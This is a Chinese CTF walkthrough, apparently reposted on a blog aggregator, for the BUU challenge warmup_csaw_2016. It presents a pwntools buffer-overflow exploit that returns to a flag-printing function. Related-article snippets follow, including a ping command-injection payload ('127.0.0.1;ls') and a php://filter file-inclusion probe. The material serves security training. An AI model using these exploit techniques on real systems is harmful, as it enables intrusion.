3.[BUU]warmup_csaw_20161

2023-12-23 02:28
文章标签 buu 20161 warmup csaw

本文主要是介绍3.[BUU]warmup_csaw_20161,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

1.checksec 检查文件类型

ELF-64-little ,无其他限权,直接用ida检查代码。

2.IDA进行反编译,进行代码审计

查看各个名称的内容:

了解基本攻击思路:

攻击思路:gets输入垃圾数据覆盖v5内容,再将sub_40060D的地址覆盖return_addr,使其调用“system”函数,执行“cat flag.txt”,输出flag,进而得到flag。

v5距离ebp大小:

ebp大小:

3.EXP

from pwn import *
io = remote('node4.buuoj.cn',27089)
context(os='linux', arch='amd64', log_level='debug')getshell=0x40060D
payload=b'a'*(0x40+0x8)+p64(getshell)io.sendline(payload)io.interactive()

因为flag是我们接收的数据,所以不用交互进行cat flag.直接在返回字符内容里面查看

这篇关于3.[BUU]warmup_csaw_20161的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/526395

相关文章

BUU CODE REVIEW 11 代码审计之反序列化知识

打开靶场,得到的是一段代码。 通过分析上面代码可以构造下面代码,获取到序列化之后的obj。 <?phpclass BUU {public $correct = "";public $input = "";public function __destruct() {try {$this->correct = base64_encode(uniqid());if($this->corre

buu逆向-刮开有奖

首先查壳 拖到ida找到主函数 进入DialogFunc函数得到 INT_PTR __stdcall DialogFunc(HWND hDlg, UINT a2, WPARAM a3, LPARAM a4){const char *v4; // esiconst char *v5; // ediint v7[2]; // [esp+8h] [ebp-20030h] BYREFint v8;

自己测到的Buu IP

www.buu.edu.cn 210.82.53.210[北京市 北京联合大学] http://it.buu.edu.cn 210.82.53.210[北京市 北京联合大学] graduate.buu.edu.cn 210.82.53.210[北京市 北京联合大学] www.lib.buu.edu.cn 210.82.53.210[北京市 北京联合大学] jd.bu

BUU-黑客帝国

题目 解题 打开txt文件后,发现很长的一段文字, 开头为52617221,猜测这是个rar文件。利用脚本将这些数据以二进制流流形式写入rar文件 import binasciiwith open('文件名', 'r') as fr:hex_data = fr.read()with open('res.rar', 'wb') as fw:fw.write(binascii.unhex

BUU-[GXYCTF2019]Ping Ping Ping

考察点 命令执行 题目 解题 简单测试 ?ip应该是一个提示,那么就测试一下?ip=127.0.0.1 http://0c02a46a-5ac2-45f5-99da-3d1b0b951307.node4.buuoj.cn:81/?ip=127.0.0.1 发现正常回显 列出文件 那么猜测一下可能会有命令执行漏洞,测试?ip=127.0.0.1;ls http://0

buu相册

010分析是一个rar文件,7z打开发现是一个apk文件 但没发现什么敏感信息 全局搜索mail 然后就是查看引用与出处 base解密完是一个邮箱,提交对了。

神经网络中 warmup 策略为什么有效

这个问题目前还没有被充分证明,我们只能从直觉上和已有的一些论文[1,2,3]得到推测: 有助于减缓模型在初始阶段对mini-batch的提前过拟合现象,保持分布的平稳有助于保持模型深层的稳定性 下面来看一下为什么warmup会有这样的效果。

BUU [CSAWQual 2016]i_got_id

题目打开有三个选项,依次点进去看。 第一个是普通页面,第二个是普通表单,第三个是文件上传。没有尝试注入(不爱做注入),直觉感觉是文件上传,就从这里入手吧。 先随便传几个文件测试下功能,发现没做什么过滤,并且返还了文件内容 初步推测用到了param()函数,然后大概推测一下后端代码 my $cgi= CGI->new;if ( $cgi->upload( 'file' ) ){my $f

BUU eating_cms

一个可爱的猫猫登陆界面,日常扫目录抓包看代码 尝试注入被waf了 发现一个注册后台,老老实实注册 register.php 登进去是个跟猫猫无关好像有一些功能点但是抓包什么也看不出的页面而且似曾相识感觉在哪里见到过。 略加思索 看看url感觉可以进行文件包含 php伪协议指南 先看看当前的页面 /user.php?page=php://filter/convert.base64-encode/

BUU virink_2019_files_share

拿到题目可以看到是一个动态魔方,页面左下角有个设置点进去只能改改颜色并没有什么信息。(不知道真把魔方还原了能不能拿到flag呢) 抓包看一下 首先看到服务器是openresty,然后有个上传文件夹和flag目录 访问uploads 只有一张图片,也没有上传点,所以试一下文件包含 先试下nginx的默认配置文件